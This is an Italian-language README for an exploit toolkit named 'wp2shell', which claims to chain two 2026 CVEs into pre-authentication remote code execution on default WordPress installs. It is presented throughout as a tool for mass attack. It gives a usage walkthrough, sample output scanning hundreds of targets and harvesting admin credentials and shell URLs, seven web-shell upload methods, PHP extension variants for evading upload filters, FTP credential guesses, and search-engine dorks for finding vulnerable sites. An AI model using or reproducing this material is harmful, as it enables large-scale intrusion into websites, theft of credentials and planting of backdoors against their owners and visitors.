
RCE pre-autenticazione nel core di WordPress — Batch Route Confusion + SQL Injection
CVE-2026-63030 (Confusione di route batch) + CVE-2026-60137 (Iniezione SQL)
Toolkit di sfruttamento a zero dipendenze per la catena di vulnerabilità wp2shell nel core di WordPress. Una singola richiesta HTTP anonima consente di ottenere l'esecuzione di codice remoto su un'installazione WordPress predefinita, senza richiedere plugin.
| Intervallo | Impatto | Corretto in |
|---|---|---|
| 7.0.0 – 7.0.1 | RCE completa | 7.0.2 |
| 6.9.0 – 6.9.4 | RCE completa | 6.9.5 |
| 6.8.0 – 6.8.5 | Solo SQLi | 6.8.6 |
Nessun plugin o configurazione speciale richiesto. Un'installazione WordPress spoglia è sfruttabile.
┌─────────────────────────────────────┐
│ ANONYMOUS HTTP REQUEST │
│ POST /?rest_route=/batch/v1 │
└────────────────┬────────────────────┘
│
┌────────────────▼────────────────────┐
│ CVE-2026-63030: Batch Desync │
│ Malformed path → WP_Error → │
│ Array misalignment → Auth Bypass │
└────────────────┬────────────────────┘
│
┌────────────────▼────────────────────┐
│ CVE-2026-60137: SQL Injection │
│ author__not_in → unsanitized → │
│ UNION SELECT extraction │
└────────────────┬────────────────────┘
│
┌───────────┼───────────┐
│ │ │
┌────▼────┐ ┌───▼────┐ ┌───▼──────────┐
│ oEmbed │ │ Blind │ │ Changeset │
│ Seeding │ │ SQLi │ │ Re-entrancy │
│ Write │ │ Read │ │ Escalation │
│ Cache │ │ IDs │ │ → Admin User │
└────┬────┘ └───┬────┘ └───┬──────────┘
│ │ │
└───────────┼───────────┘
│
┌────────────────▼────────────────────┐
│ ADMIN CREATED (pre-auth!) │
│ → Login → Upload Shell (7 methods) │
└─────────────────────────────────────┘
pip install requests
python exploit.py
╔══════════════════════════════════════════════════════════════╗
║ WP2SHELL — WordPress Core Pre-Auth RCE Exploit ║
║ CVE-2026-63030 (Batch Route Confusion) + CVE-2026-60137 ║
║ Affected: WP 6.9.0 – 7.0.1 | Fixed: 6.9.5 / 7.0.2 ║
╚══════════════════════════════════════════════════════════════╝
[?] Target [url/list.txt] > list.txt
[?] Threads [15] > 15
python exploit.py
[?] Target [url/list.txt] > https://vulnerable-site.com
┌────────────────────────────────────────────────────────┐
│ SCAN CONFIGURATION │
├────────────────────────────────────────────────────────┤
│ Targets : 1 Threads : 1 Dir : wp_core_rce│
└────────────────────────────────────────────────────────┘
┌────────────────────────────────────────────────────────┐
│ EXPLOIT SUCCESS │
├────────────────────────────────────────────────────────┤
│ Method : direct-plugin │
│ Shell : https://target.com/wp-content/plugins/... │
│ Login : https://target.com/wp-login.php │
│ User : wp2s_abc123def │
│ Pass : WP2S!xxxxxxxxxxxxxxxx │
└────────────────────────────────────────────────────────┘
python exploit.py
┌────────────────────────────────────────────────────────┐
│ SCAN CONFIGURATION │
├────────────────────────────────────────────────────────┤
│ Targets : 500 Threads : 15 Dir : wp_core_rce │
└────────────────────────────────────────────────────────┘
┌────────────┬────────────────────────────────────────┬──────────────┐
│ │ │ │
│ #/TOTAL │ HOST │ STATUS │
├────────────┼────────────────────────────────────────┼──────────────┤
│ 1/500 │ vulnerable-site.com │ SHELL │
│ │ ↳ direct-plugin → https://vulnerabl... │
│ 2/500 │ target2.com │ ADM │
│ 3/500 │ safe-site.org │ SQLi │
│ 4/500 │ nope.com │ NO │
│ 5/500 │ jackpot.net │ SHELL │
│ │ ↳ theme-editor → https://jackpot.ne... │
└────────────┴────────────────────────────────────────┴──────────────┘
┌────────────────────────────────────────────────────────┐
│ SHELL 2 ADMIN 3 SQLi 15 TOTAL 50/500│
└────────────────────────────────────────────────────────┘
├────────────────────────────────────────────────────────┤
│ result.txt │ admin credentials │
│ result_upload.txt │ shell upload URLs │
│ log/scanned.txt │ scanned hosts │
└────────────────────────────────────────────────────────┘
requests solo per l'expander)log/scanned.txt salta i target già scansionatiTutti i 7 metodi vengono eseguiti in parallelo tramite ThreadPoolExecutor. Il primo metodo che ha successo vince e gli altri vengono annullati.
| # | Metodo | Descrizione |
|---|---|---|
| 1 | direct-plugin | Carica zip tramite /wp-admin/plugin-install.php |
| 2 | direct-theme | Carica zip tramite /wp-admin/theme-install.php |
| 3 | rest-api | Invia zip in POST a /wp-json/wp/v2/plugins con cookie di autenticazione |
| 4 | plugin-editor | Scrive PHP direttamente tramite /wp-admin/plugin-editor.php |
| 5 | theme-editor | Scrive PHP nella directory del tema attivo |
| 6 | ftp-bypass | Invia le credenziali FTP quando WordPress le richiede |
| 7 | media-upload | Carica PHP tramite la libreria media con 15 varianti di estensione |
Estensioni per il media upload: .phtml .php5 .php7 .php8 .pht .phar .shtml .php4 .phps .phtm .Php5 .PhP5 .pHtml .phP .PHP
Credenziali FTP tentate: localhost / 127.0.0.1 con root / www-data / credenziali admin di WordPress
| File | Contenuto |
|---|---|
result.txt | Credenziali admin: url.com/wp-login.php:user:pass |
result_upload.txt | URL delle shell: shell_url | login_url:user:pass | method |
log/scanned.txt | Tutti gli host scansionati (salto automatico al nuovo avvio) |
http.title:"WordPress"
http.component:"WordPress"
app="WordPress"
body="wp-json"
body="/batch/v1"
app:"WordPress"
"/wp-json/batch/v1"